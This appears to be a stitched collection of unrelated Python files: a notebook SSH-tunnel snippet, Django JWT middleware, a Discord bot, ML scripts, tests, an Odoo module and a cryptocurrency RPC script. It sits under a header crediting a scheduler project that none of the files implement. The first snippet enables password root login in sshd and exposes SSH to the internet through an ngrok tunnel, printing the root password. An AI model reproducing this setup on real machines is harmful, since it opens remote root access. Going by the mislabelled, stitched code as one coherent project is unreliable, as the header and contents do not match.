__author__ = 'Timur Faradzhov'
__copyright__ = 'Copyright 2019, The Pypyrus Runner Project'
__credits__ = ['Timur Faradzhov']
__license__ = 'MIT'
__version__ = '0.0.1'
__maintainer__ = 'Timur Faradzhov'
__email__ = 'timurfaradzhov@gmail.com'
__status__ = 'Production'
__doc__ = 'Python scheduler and job manager.'
|
import random, string, urllib.request, json, getpass
#Generate root password
password = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20))
#Download ngrok
! wget -q -c -nc https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
! unzip -qq -n ngrok-stable-linux-amd64.zip
#Setup sshd
! apt-get install -qq -o=Dpkg::Use-Pty=0 openssh-server pwgen > /dev/null
#Set root password
! echo root:$password | chpasswd
! mkdir -p /var/run/sshd
! echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
! echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config
! echo "LD_LIBRARY_PATH=/usr/lib64-nvidia" >> /root/.bashrc
! echo "export LD_LIBRARY_PATH" >> /root/.bashrc
#Run sshd
get_ipython().system_raw('/usr/sbin/sshd -D &')
#Ask token
print("Copy authtoken from https://dashboard.ngrok.com/auth")
authtoken = getpass.getpass()
#Create tunnel
get_ipython().system_raw('./ngrok authtoken $authtoken && ./ngrok tcp 22 &')
#Get public address and print connect command
with urllib.request.urlopen('http://localhost:4040/api/tunnels') as response:
data = json.loads(response.read().decode())
(host, port) = data['tunnels'][0]['public_url'][6:].split(':')
print(f'SSH command: ssh -p{port} root@{host}')
#Print root password
print(f'Root password: {password}')
|
import bjoern
from app import app
bjoern.run(
wsgi_app=app,
host='0.0.0.0',
port=5000,
reuse_port=True
)
|
# -*- coding: utf-8 -*-
__author__ = 'ffuentes'
from datetime import datetime
from django.conf import settings
from django.contrib.auth.middleware import get_user
from django.contrib.auth.models import User
from django.contrib.sessions.models import Session
from django.contrib.sessions.backends.base import UpdateError
from django.core.exceptions import ObjectDoesNotExist, SuspiciousOperation
from django.shortcuts import redirect
from django.utils.cache import patch_vary_headers
from django.utils.functional import SimpleLazyObject
from django.utils.http import cookie_date
from graphql_jwt import signals
from graphql_jwt.settings import jwt_settings
from graphql_jwt.shortcuts import get_token, get_user_by_token
from graphql_jwt.refresh_token.shortcuts import refresh_token_lazy
from graphql_jwt.refresh_token.signals import refresh_token_rotated
from graphql_jwt.utils import get_credentials, get_payload
from graphql_jwt.exceptions import JSONWebTokenError, JSONWebTokenExpired
from importlib import import_module
import time
import logging
logger = logging.getLogger(__name__)
def token_is_expired(token):
ret = False
try:
get_payload(token)
except JSONWebTokenError:
ret = True
except JSONWebTokenExpired:
ret = True
return ret
def get_user_from_session_key(session_key):
session = Session.objects.get(session_key=session_key)
session_data = session.get_decoded()
uid = session_data.get('_auth_user_id')
user = User.objects.get(id=uid)
return user
def delete_jwt_cookie(request, response):
max_age = request.session.get_expiry_age()
anti_expires_time = cookie_date(time.time() - max_age)
response.set_cookie(
jwt_settings.JWT_COOKIE_NAME,
'',
domain=settings.COOKIE_DOMAIN,
expires=anti_expires_time,
secure=settings.JWT_COOKIE_SECURE or None,
httponly=settings.JWT_COOKIE_HTTPONLY or None,
samesite='Lax',
)
class SRIJWTAuthMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
session_created = False
has_token = False
# add user
request.user = SimpleLazyObject(lambda: get_user(request))
token = get_credentials(request)
if token is not None and token != '' and token != 'None' and \
not token_is_expired(token):
user = get_user_by_token(token, request)
request.user = user
has_token = True
# add session
if not hasattr(request, 'session'):
session_engine = import_module(settings.SESSION_ENGINE)
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
# if the session cannot be saved, start with an empty session
try:
request.session = session_engine.SessionStore(session_key)
request.session.save()
session_created = True
except UpdateError:
response = redirect(request.get_full_path())
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
response.delete_cookie(jwt_settings.JWT_COOKIE_NAME)
patch_vary_headers(response, ('Cookie',))
return response
max_age = request.session.get_expiry_age()
expires_time = time.time() + max_age
anti_expires_time = cookie_date(time.time() - max_age)
cookie_expires = cookie_date(expires_time)
if request.session.get_expire_at_browser_close():
max_age = None
cookie_expires = None
if token and token_is_expired(token):
cookie_token = request.COOKIES.get(jwt_settings.JWT_COOKIE_NAME)
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME)
if cookie_token and cookie_token != '""':
try:
user = get_user_from_session_key(session_key)
request.user = user
refresh_token_lazy(request.user)
token = get_token(request.user)
refresh_token_rotated.send(
sender=SRIJWTAuthMiddleware,
request=request,
refresh_token=self,
)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
except ObjectDoesNotExist:
## fallback solution
response = redirect(request.get_full_path())
delete_jwt_cookie(request, response)
patch_vary_headers(response, ('Cookie',))
return response
# process response with inner middleware
response = self.get_response(request)
if request.user.is_authenticated and not has_token:
token = get_token(request.user)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
# if token is expired, refresh it
if token_is_expired(token):
refresh_token_lazy(request.user)
token = get_token(request.user)
refresh_token_rotated.send(
sender=SRIJWTAuthMiddleware,
request=request,
refresh_token=self,
)
signals.token_issued.send(
sender=SRIJWTAuthMiddleware, request=request, user=request.user)
#expires = datetime.utcnow() + jwt_settings.JWT_EXPIRATION_DELTA
response.set_cookie(
jwt_settings.JWT_COOKIE_NAME,
token,
domain=settings.COOKIE_DOMAIN,
max_age=max_age,
expires=cookie_expires,
secure=settings.JWT_COOKIE_SECURE or None,
httponly=settings.JWT_COOKIE_HTTPONLY or None,
samesite='Lax',
)
patch_vary_headers(response, ('Cookie',))
accessed = request.session.accessed
modified = request.session.modified
empty = request.session.is_empty()
# we'll force the session cookie creation if:
# * we have a valid token but we didn't have a session for the user
# * the session was not created because the user is logged in
create_session_cookie = token and session_created \
or token and not request.user.is_authenticated
if settings.SESSION_COOKIE_NAME in request.COOKIES and empty:
response.delete_cookie(
settings.SESSION_COOKIE_NAME,
path=settings.SESSION_COOKIE_PATH,
domain=settings.SESSION_COOKIE_DOMAIN,
)
response.delete_cookie(jwt_settings.JWT_COOKIE_NAME)
patch_vary_headers(response, ('Cookie',))
else:
if accessed:
patch_vary_headers(response, ('Cookie',))
try:
SESSION_SAVE_EVERY_REQUEST = settings.SESSION_SAVE_EVERY_REQUEST
except AttributeError:
SESSION_SAVE_EVERY_REQUEST = None
if (modified or SESSION_SAVE_EVERY_REQUEST) and not empty or create_session_cookie:
# Save the session data and refresh the client cookie.
# Skip session save for 500 responses, refs #3881.
if response.status_code != 500:
try:
request.session.save()
except UpdateError:
raise SuspiciousOperation(
"The request's session was deleted before the "
"request completed. The user may have logged "
"out in a concurrent request, for example."
)
response.set_cookie(
settings.SESSION_COOKIE_NAME,
request.session.session_key, max_age=max_age,
expires=cookie_expires, domain=settings.SESSION_COOKIE_DOMAIN,
path=settings.SESSION_COOKIE_PATH,
secure=settings.SESSION_COOKIE_SECURE or None,
httponly=settings.SESSION_COOKIE_HTTPONLY or None,
samesite='Strict',
)
return response
|
import os
import shutil
import pickle
import numpy as np
import dnnlib
import dnnlib.tflib as tflib
import config
from encoder.generator_model import Generator
import sys
from moviepy.editor import *
if __name__ == "__main__":
if len(sys.argv)>1:
ENC_DIR = sys.argv[1]
else:
ENC_DIR = 'enc'
if len(sys.argv) > 2:
OUTPUT_DIR = sys.argv[2]
else:
OUTPUT_DIR = os.path.join('..', 'output')
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
os.makedirs(OUTPUT_DIR, exist_ok=True)
URL_FFHQ = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ'
URL_FFHQ_mirror = 'https://drive.google.com/uc?id=19B138TWKeOs-JIol0_K-CCCDMYXbK5bk'
tflib.init_tf()
try:
with dnnlib.util.open_url(URL_FFHQ, cache_dir=config.cache_dir) as f:
generator_network, discriminator_network, Gs_network = pickle.load(f)
except:
with dnnlib.util.open_url(URL_FFHQ_mirror, cache_dir=config.cache_dir) as f:
generator_network, discriminator_network, Gs_network = pickle.load(f)
generator = Generator(Gs_network, batch_size=1, randomize_noise=False)
def generate_image(latent_vector):
latent_vector = latent_vector.reshape((1, 18, 512))
generator.set_dlatents(latent_vector)
return generator.generate_images()[0]
def move_and_show(latent_vector, direction, coeffs, out_name):
vid_name = os.path.join(OUTPUT_DIR, out_name.replace('.npy', '.mp4'))
gen = {}
for i, coeff in enumerate(coeffs):
new_latent_vector = latent_vector.copy()
new_latent_vector[:8] = (latent_vector + coeff * direction)[:8]
if coeff not in gen:
gen[coeff] = generate_image(new_latent_vector)
video = ImageSequenceClip([gen[coeff] for coeff in coeffs], fps=30)
video.write_videofile(vid_name, codec='libx264')
print('finished '+vid_name)
smile_direction = np.load('ffhq_dataset/latent_directions/smile.npy')
coeffs = np.concatenate([np.arange(0, 2, .02), np.arange(2, -2, -.02), np.arange(-2, 0, .02)])
for file in os.listdir(ENC_DIR):
img = np.load(os.path.join(ENC_DIR, file))
move_and_show(img, smile_direction, coeffs, file)
|
print('Estamos probando conectar repositorio local con el de la nube')
|
import discord
import threading
import os
import random
from re import search
from flask import Flask, request, jsonify
from bot.models.intent import Intent
from bot.models.question_intent import QuestionIntent
from bot.constants.game_players import LeaguePlayers
from concurrent.futures import ThreadPoolExecutor
from .services.intent_proposer import IntentProposer
from .services.question_proposer import QuestionProposer
from .services.player_service import PlayerService
from .services.question_service import QuestionService
MAX_WORKERS = 3
client = discord.Client()
player_service = PlayerService()
question_service = QuestionService()
FLIPPING_CHOICES = ["(╯°Д°)╯︵/(.□ . \)", "ヽ(ຈل͜ຈ)ノ︵ ┻━┻", "(☞゚ヮ゚)☞ ┻━┻", "┻━┻︵ \(°□°)/ ︵ ┻━┻", "(┛ಠ_ಠ)┛彡┻━┻", "(╯°□°)╯︵ ┻━┻", "(ノಠ益ಠ)ノ彡┻━┻", "┻━┻︵ \(°□°)/ ︵ ┻━┻", "ʕノ•ᴥ•ʔノ ︵ ┻━┻", "(┛❍ᴥ❍)┛彡┻━┻", "(╯°□°)╯︵ ┻━┻ ︵ ╯(°□° ╯)", "(ノ^◡^)ノ︵ ┻━┻"]
UNFLIPPING_CHOICES = ["┬─┬ノ( ◕◡◕ ノ)", "┳━┳ ヽ(ಠل͜ಠ)ノ", "┏━┓┏━┓┏━┓ ︵ /(^.^/)", "┬─┬ノ( ಠ_ಠノ)", "(ヘ・_・)ヘ ┳━┳", "┳━┳ノ( OωOノ )", "┬──┬ ¯\_(ツ)", "┣ヘ(^▽^ヘ)Ξ(゚▽゚*)ノ┳━┳", "┬───┬ ノ༼ຈ ل͜ຈノ༽", "┬──┬ ノ( ゜-゜ノ)", "┏━┓ ︵ /(^.^/)"]
# Called when the client is done preparing the data received
# from Discord. Usually after login is successful and the
# Client.guilds and co. are filled up.
@client.event
async def on_ready():
print("Logged in")
# Called when the client has disconnected from Discord.
# This could happen either through the internet being disconnected,
# explicit calls to logout, or Discord terminating
# the connection one way or the other.
# This function can be called many times.
@client.event
async def on_disconnect():
print("Logged out")
@client.event
async def on_message(message):
# Don't let bot respond to itself
if message.author == client.user:
return
if not (search("elsa", message.content.lower())) \
and not (search("┻━┻", message.content)) \
and not (search("┳━┳", message.content)) \
and not search("┏━┓", message.content):
return
    # proposers are stateful, so we need to make new ones on each run
# todo: make proposers stateless
intent_proposer = IntentProposer()
question_proposer = QuestionProposer()
is_question = False
# Determine intent
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
intent_future = executor.submit(intent_proposer.determine_intent, (message.content))
question_intent_future = executor.submit(question_proposer.determine_intent, (message.content))
intent, intent_confidence = intent_future.result()[0], intent_future.result()[1]
question_intent, question_confidence = question_intent_future.result()[0], question_intent_future.result()[1]
print(f"Intent: {intent}, Confidence: {str(intent_confidence)}")
print(f"Question Intent: {question_intent}, Confidence: {str(question_confidence)}")
is_question = True if (question_confidence >= intent_confidence) else False
if is_question:
await route_question_intent(message, question_intent)
else:
await route_intent(message, intent)
async def route_question_intent(message, intent):
if intent == QuestionIntent.EnoughForFivesIntent:
def filter_offline(member):
return member.status != discord.Status.offline and not member.bot
online_members = list(map(lambda x: x.name, filter(filter_offline, message.guild.members)))
league = list(filter(lambda x: x in LeaguePlayers, online_members))
if len(league) > 4:
await message.channel.send("Looks like it, online members that play league:\n" + ',\n'.join(league))
else:
await message.channel.send(f"Nope, looks like we need {5 - len(league)} more. Current online members that play league:\n" + ',\n'.join(league))
if intent == QuestionIntent.SkillQuestionIntent:
msg = question_service.choose_random_name()
await message.channel.send(msg)
if intent == QuestionIntent.UnknownQuestionIntent:
await message.channel.send("Unknown question")
async def route_intent(message, intent):
if intent == Intent.PlayGameIntent:
await message.channel.send("Ability to send messages to other players to play a game is not yet implemented")
if intent == Intent.UpdateProfileIntent:
await message.channel.send("Profiles are not yet implemented")
if intent == Intent.IdentifyPlayerIntent:
msg = player_service.get_player_opgg_profile(message)
await message.channel.send(msg)
if intent == Intent.FlipTableIntent:
await message.channel.send(random.choice(UNFLIPPING_CHOICES))
if intent == Intent.UnflipTableIntent:
await message.channel.send(random.choice(FLIPPING_CHOICES))
if intent == Intent.UnknownIntent:
await message.channel.send("Unknown intent")
client.run(os.environ.get("BOT_TOKEN"))
|
from os import (getcwd, path as osp)
from unittest.mock import (patch, MagicMock)
from click.testing import CliRunner
import pytest
from thug.cli import (meme, thug_meme, _form_result_path)
from .conftest import IMG_1_FACE
@pytest.fixture
def cli_runner():
return CliRunner()
@patch('thug.cli.Meme')
class TestMeme:
def test_it_creates_meme(self, meme_cls, cli_runner):
res = cli_runner.invoke(
meme, [IMG_1_FACE, 'my awesome', 'test meme'],
catch_exceptions=False)
assert res.exit_code == 0
assert meme_cls.return_value.create.call_count == 1
_, meme_kwargs = meme_cls.call_args
assert meme_kwargs['txt1'] == 'my awesome'
assert meme_kwargs['txt2'] == 'test meme'
@patch('thug.cli.ThugMeme')
class TestThug:
@pytest.mark.parametrize('detector_arg, detector',
[('opencv', 'thug.cli.HaarCascadeDetector'),
('dlib', 'thug.detect.dlib.DlibDetector')])
def test_it_creates_thug_meme(self, meme_cls, cli_runner, detector_arg,
detector):
with patch(detector) as detector:
detector = detector.return_value
thugs = MagicMock()
detector.find_thug_landmarks.return_value = thugs
res = cli_runner.invoke(
thug_meme, [
IMG_1_FACE, 'my awesome', 'thug meme', '--detector',
detector_arg
],
catch_exceptions=False)
assert res.exit_code == 0
assert detector.find_thug_landmarks.call_count == 1
assert meme_cls.return_value.create.call_count == 1
_, meme_kwargs = meme_cls.call_args
assert meme_kwargs['thug_landmarks'] == thugs
assert meme_kwargs['txt1'] == 'my awesome'
assert meme_kwargs['txt2'] == 'thug meme'
def test_it_does_not_accept_unknown_detector(self, meme_cls, cli_runner):
res = cli_runner.invoke(
thug_meme,
[IMG_1_FACE, 'my awesome', 'thug meme', '--detector', 'unknown'],
catch_exceptions=False)
assert res.exit_code == 2
assert not meme_cls.return_value.create.call_count
@pytest.mark.parametrize('meme_cls, command',
[('thug.cli.Meme', meme),
('thug.cli.ThugMeme', thug_meme)])
class TestCommonCliArgs:
def test_it_does_not_create_with_invalid_path(self, cli_runner, meme_cls,
command):
fpath = 'no-meme-for-you'
with patch(meme_cls) as meme_cls:
res = cli_runner.invoke(
command, [fpath, '', ''], catch_exceptions=False)
assert res.exit_code == 2
assert not meme_cls.return_value.create.call_count
@patch('thug.detect.dlib.DlibDetector')
@patch('thug.cli.HaarCascadeDetector')
def test_it_takes_into_account_config_overrides(
self, detector1, detector2, cli_runner, meme_cls, command):
o1 = ['-o', 'cigar_length', '0.123']
o2 = ['-o', 'glasses_width', '0.321']
o3 = ['-o', 'uknown', 'not going to be used']
args = [IMG_1_FACE, '', ''] + o1 + o2 + o3
with patch(meme_cls) as meme_cls:
res = cli_runner.invoke(command, args, catch_exceptions=False)
assert res.exit_code == 0
_, kwargs = meme_cls.call_args
conf = kwargs['config']
assert conf['cigar_length'] == '0.123'
assert conf['glasses_width'] == '0.321'
assert 'unknown' not in conf
class TestFormResultPath:
# yapf:disable
@pytest.mark.parametrize(
'orig_fname, extra, expected_fname',
[('img.jpg', '-thug', 'img-thug.jpg'),
('img.jpg', '', 'img.jpg'),
('img.with.dots.jpg', '-thug', 'img.with.dots-thug.jpg'),
('.starts-with-dot.jpg', '-thug', '.starts-with-dot-thug.jpg')])
# yapf:enable
def test_it_converts_file_name(self, orig_fname, extra, expected_fname):
orig = osp.join(osp.dirname(__file__), orig_fname)
result_dir = getcwd()
res = _form_result_path(
orig_path=orig, result_dir=result_dir, fname_extra=extra)
assert res == osp.join(result_dir, expected_fname)
|
from a10sdk.common.A10BaseClass import A10BaseClass
class AuthSamlIdp(A10BaseClass):
""" :param remote_file: {"optional": true, "type": "string", "description": "Profile name for remote url", "format": "url"}
:param use_mgmt_port: {"default": 0, "optional": true, "type": "number", "description": "Use management port as source port", "format": "flag"}
:param verify_xml_signature: {"default": 0, "optional": true, "type": "number", "description": "Verify metadata's XML signature", "format": "flag"}
:param saml_idp_name: {"description": "Metadata name", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}
:param overwrite: {"default": 0, "optional": true, "type": "number", "description": "Overwrite existing file", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
SAML metadata of identity provider.
Class auth-saml-idp supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/import/auth-saml-idp`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "auth-saml-idp"
self.a10_url="/axapi/v3/import/auth-saml-idp"
self.DeviceProxy = ""
self.remote_file = ""
self.use_mgmt_port = ""
self.verify_xml_signature = ""
self.saml_idp_name = ""
self.overwrite = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
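# Minimal usage sketch (assumes an already-configured device proxy named `proxy`;
# the metadata name and URL are placeholders):
#   idp = AuthSamlIdp(saml_idp_name="corp-idp",
#                     remote_file="https://idp.example.com/metadata.xml",
#                     overwrite=1, DeviceProxy=proxy)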
|
import optunity
import optunity.metrics
# comment this line if you are running the notebook
import sklearn.svm
import numpy as np
decision_values = np.array([-0.69354811, -0.69354743, -0.69354744, -0.69354754, -0.69354715, -0.69354866, -0.69354775, -0.69355032, -0.69355325])
y_test = [0, 0, 0, 0, 0, 0, 0, 0, 0]
auc = optunity.metrics.roc_auc(y_test, decision_values)
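# Hedged addition (not in the original snippet): report the computed score when
# the file is run as a script.
print('ROC AUC:', auc)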
|
# Solution of;
# Project Euler Problem 119: Digit power sum
# https://projecteuler.net/problem=119
#
# The number 512 is interesting because it is equal to the sum of its digits
# raised to some power: 5 + 1 + 2 = 8, and 8^3 = 512. Another example of a
# number with this property is 614656 = 28^4. We shall define a_n to be the
# nth term of this sequence and insist that a number must contain at least
# two digits to have a sum. You are given that a_2 = 512 and a_10 = 614656.
# Find a_30.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
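# A minimal sketch of one way to build the digit power sum sequence, separate from
# the timed `dummy` stub above: enumerate base**exponent, keep values with at least
# two digits whose digit sum equals the base, and sort. The search bounds
# (base < 100, exponent <= 20) are assumptions, not taken from the original solution.
def digit_power_sums(count=30):
    hits = set()
    for base in range(2, 100):      # candidate digit sums
        value = base
        for _ in range(2, 21):      # exponents 2..20
            value *= base
            if value >= 10 and sum(int(d) for d in str(value)) == base:
                hits.add(value)
    return sorted(hits)[:count]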
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 119
timed.caller(dummy, n, i, prob_id)
|
from odoo import api, fields, models
class SaleOrderInfo(models.Model):
_inherit = 'sale.order'
order_day_info = fields.Char('Order Day')
Discount_code = fields.Char('Discount Code')
customer_email = fields.Char(related='partner_id.email', string='Customer Email')
    def copy(self, default=None):
        global lines
        if default is None:
            default = {}
        if not default.get('partner_id'):
            default['partner_id'] = 59
lines = [(5, 0, 0)]
val = {
'product_id': 61
}
lines.append((0, 0, val))
self.order_line = lines
return super(SaleOrderInfo, self).copy(default)
class Saleorderline(models.Model):
_inherit = 'sale.order.line'
product_short_code = fields.Char('Product Short Code')
# product_category = fields.Many2one(comodel_name='product.template', string="Product Category")
cat = fields.Char(related = 'product_id.product_tmpl_id.categ_id.name')
class AddDetail(models.Model):
_inherit = 'sale.order'
def add_detail(self):
return True
class Tax(models.Model):
_inherit = 'sale.order'
tax_discount = fields.Selection([('10%', '10%'),
('5%', '5%'), ],
'Tax Discount',)
discount = fields.Float('Discount', readonly=True)
@api.onchange('tax_discount')
def discount_amount(self):
if self.tax_discount == '10%':
self.discount = ((10*self.amount_untaxed)/100)
self.amount_total = (self.amount_untaxed - self.discount + self.amount_tax)
elif self.tax_discount == '5%':
self.discount = ((5*self.amount_untaxed)/100)
self.amount_total = (self.amount_untaxed - self.discount + self.amount_tax)
else:
            self.discount = 0
|
import sys
import argparse
import torch
import torch.nn.functional as F
from transformers import AutoTokenizer
from transformers import BertForSequenceClassification
sys.stdin.reconfigure(encoding='utf-8')
sys.stdout.reconfigure(encoding='utf-8')
def define_argparser():
p = argparse.ArgumentParser()
p.add_argument('--model_fn', default='bert_model.pth')
p.add_argument('--gpu_id',
type=int,
default=0 if torch.cuda.is_available() else -1)
p.add_argument('--batch_size', type=int, default=256)
p.add_argument('--top_k', type=int, default=1)
return p.parse_args()
def read_text():
lines = []
for line in sys.stdin:
if line.strip() != '':
lines += [line.strip()]
return lines
def main(config):
saved_data = torch.load(
config.model_fn,
map_location='cpu' if config.gpu_id < 0 else 'cuda:%d' % config.gpu_id
)
train_config = saved_data['config']
bert_best = saved_data['bert']
index_to_label = saved_data['classes']
lines = read_text()
with torch.no_grad():
# Declare model and load pre-trained weights.
tokenizer = AutoTokenizer.from_pretrained(train_config.pretrained_model_name)
model = BertForSequenceClassification.from_pretrained(
train_config.pretrained_model_name,
num_labels=len(index_to_label)
)
# 학습시켰던 다운스트림 태스크 모델을 삽입.
model.load_state_dict(bert_best)
if config.gpu_id >= 0:
model.cuda(config.gpu_id)
device = next(model.parameters()).device
model.eval()
y_hats = []
for idx in range(0, len(lines), config.batch_size):
mini_batch = tokenizer(
lines[idx:idx + config.batch_size],
padding=True,
truncation=True,
return_tensors='pt'
)
x = mini_batch['input_ids']
x = x.to(device)
mask = mini_batch['attention_mask']
mask = mask.to(device)
y_hat = F.softmax(model(x, attention_mask=mask)[0], dim=-1)
y_hats += [y_hat]
# Concatenate the mini-batch wise result
y_hats = torch.cat(y_hats, dim=0)
# |y_hats| = (len(lines), n_classes)
probs, indice = y_hats.cpu().topk(config.top_k)
# |indice| = (len(lines), top_k)
for i in range(len(lines)):
sys.stdout.write('%s\t%s\n' % (
' '.join([index_to_label[int(indice[i][j])] for j in range(config.top_k)]),
lines[i]
))
if __name__ == '__main__':
config = define_argparser()
main(config)
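# Usage sketch (the script file name is an assumption): pipe one sentence per line
# on stdin, e.g.
#   echo "this movie was great" | python classify.py --model_fn bert_model.pth --top_k 2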
|
import sys
import os
import numpy as np
import torch
from tqdm import tqdm
from tabulate import tabulate
from torch.utils.data import DataLoader
from data.lmdb_dataset import LMDBDataset
from data.meta_dataset_reader import TRAIN_METADATASET_NAMES, ALL_METADATASET_NAMES
from models.model_utils import CheckPointer, sigmoid, cosine_sim
from models.model_helpers import get_domain_extractors
from models.losses import prototype_loss
from models.sur import apply_selection, sur
from models.models_dict import DATASET_MODELS_DICT
from utils import device
from config import args
def main():
LIMITER = 600
# Setting up datasets
extractor_domains = TRAIN_METADATASET_NAMES
all_test_datasets = ALL_METADATASET_NAMES
dump_name = args['dump.name'] if args['dump.name'] else 'test_dump'
testset = LMDBDataset(extractor_domains, all_test_datasets,
args['model.backbone'], 'test', dump_name, LIMITER)
# define the embedding method
dataset_models = DATASET_MODELS_DICT[args['model.backbone']]
embed_many = get_domain_extractors(extractor_domains, dataset_models, args)
accs_names = ['SUR']
all_accs = dict()
# Go over all test datasets
for test_dataset in all_test_datasets:
print(test_dataset)
testset.set_sampling_dataset(test_dataset)
test_loader = DataLoader(testset, batch_size=None, batch_sampler=None, num_workers=16)
all_accs[test_dataset] = {name: [] for name in accs_names}
for sample in tqdm(test_loader):
context_labels = sample['context_labels'].to(device)
target_labels = sample['target_labels'].to(device)
context_features_dict = {k: v.to(device) for k, v in sample['context_feature_dict'].items()}
target_features_dict = {k: v.to(device) for k, v in sample['target_feature_dict'].items()}
# optimize selection parameters and perform feature selection
selection_params = sur(context_features_dict, context_labels, max_iter=40)
selected_context = apply_selection(context_features_dict, selection_params)
selected_target = apply_selection(target_features_dict, selection_params)
final_acc = prototype_loss(selected_context, context_labels,
selected_target, target_labels)[1]['acc']
all_accs[test_dataset]['SUR'].append(final_acc)
# Make a nice accuracy table
rows = []
for dataset_name in all_test_datasets:
row = [dataset_name]
for model_name in accs_names:
acc = np.array(all_accs[dataset_name][model_name]) * 100
mean_acc = acc.mean()
conf = (1.96 * acc.std()) / np.sqrt(len(acc))
row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
rows.append(row)
table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
print(table)
print("\n")
if __name__ == '__main__':
main()
|
import os
import sys
from requests import post
# A stupid fix for a stupid problem: PyCharm overwrites the PYTHONPATH
# that is set in the Dockerfile
sys.path.append('/opt/api')
from core.blockchain.projectpai.paicoin.transaction import Transaction
CRYPTO_HOST = os.environ['CRYPTO_HOST']
CRYPTO_PORT = os.environ['CRYPTO_PORT']
CRYPTO_USER = os.environ['CRYPTO_USER']
CRYPTO_PASS = os.environ['CRYPTO_PASS']
CRYPTO_URL = r'http://%s:%s@%s:%s/' % (CRYPTO_USER,
CRYPTO_PASS,
CRYPTO_HOST,
CRYPTO_PORT)
def rpc(method, *params):
data = {"method": method,
"params": params,
"jsonrpc": "2.0"}
response = post(url=CRYPTO_URL, json=data)
return response
def bitcoin_verif():
txid = '01e8264ec83a95c542b84b517f50e07db48dd74791f5aecf2db193ed29ef47b4'
ref = '1670761-059393'
txid = 'be50ee21dc3ccfa82af175f2c4f65e818bef22df932f6255fc9c0dd30f997e75'
ref = '1670863-020670'
uuid = b'XhAT6dDrnt7ce7Tb7iKwouZ4v9BA2v9C'.decode('utf-8')
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
transaction.retrieve_by_txid(txid)
transaction.retrieve(ref)
def paicoin_verif_testnet():
txid = 'e4322d358c86a4eef1469cb4605fdc9775dc62e4813032dddf6cae8ecc7fc587'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
r2 = transaction.retrieve(ref)
return r2
def paicoin_verif_testnet2():
txid = r'378a3afbf690cefb38136c1fef0fa6a99dae2612bcb6cfbfb1678b9ee2cf9b96'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
def paicoin_verif_mainnet():
txid = r'81836400818dad36c96b128504f300e5d7568748de57db349ae8697a62851a69'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'].lower() == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
r.raise_for_status()
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
def paicoin_verif_mainnet2():
txid = r'8bbde050c4e4589d5bbe923e7b3f54e97132f889e7c818932f8b3a836d2e356a'
ref = '1717761-013028'
testnet = True if os.environ['BLOCKCHAIN_NET'] == 'testnet' else False
blockchain_type = os.environ['BLOCKCHAIN_TYPE']
r = rpc('getrawtransaction', txid, 1)
transaction = Transaction(url=f'http://{CRYPTO_HOST}:{CRYPTO_PORT}',
auth=(CRYPTO_USER, CRYPTO_PASS),
testnet=testnet,
blockchain_type=blockchain_type)
r1 = transaction.retrieve_by_txid(txid)
return r1
'''
op_return
